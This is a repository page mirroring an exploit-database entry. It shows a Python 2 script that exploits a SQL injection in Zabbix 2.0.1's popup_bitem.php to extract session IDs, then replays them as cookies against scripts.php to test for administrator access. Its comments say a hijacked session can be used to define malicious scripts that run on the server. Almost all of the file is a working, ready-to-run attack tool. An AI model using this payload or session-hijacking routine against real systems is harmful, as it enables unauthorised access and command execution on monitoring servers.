bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/20087.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

61 lines
No EOL
2 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
import re
import sys,urllib2,urllib
print "\n[*] Zabbix 2.0.1 Session Extractor 0day"
print "[*] http://www.offensive-security.com"
print "##################################\n"
'''
The sessions found by this tool may allow you to access the scripts.php file.
Through this web interface, an administrator can define new malicious scripts.
These scripts can then be called from the maps area, and executed with "zabbix" permissions.
Timeline:
17 Jul 2012: Vulnerabilty reported
17 Jul 2012: Reply received
18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348
19 Jul 2012: Fixed for inclusion in version 2.0.2
'''
ip="172.16.164.150"
target = 'http://%s/zabbix/popup_bitem.php' % ip
url = 'http://%s/zabbix/scripts.php' % ip
def sendSql(num):
global target
payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num
payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num
values = {'dstfrm':'1','itemid':payload }
url = "%s?%s" % (target, urllib.urlencode(values))
req = urllib2.Request(url)
response = urllib2.urlopen(req)
data = response.read()
return data
def normal(cookie):
global url
req = urllib2.Request(url)
cook = "zbx_sessionid=%s" %cookie
req.add_header('Cookie', cook)
response = urllib2.urlopen(req)
data = response.read()
if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):
return "FAIL"
else:
return "SUCCESS"
sessions=[]
for m in range(1,2):
print "[*] Searching sessions belonging to id %s" % m
hola=sendSql(m)
for l in re.findall(r"([a-fA-F\d]{32})", hola):
if l not in sessions:
sessions.append(l)
print "[*] Found sessionid %s - %s" % (l,normal(l))
Reference in a new issue View git blame Copy permalink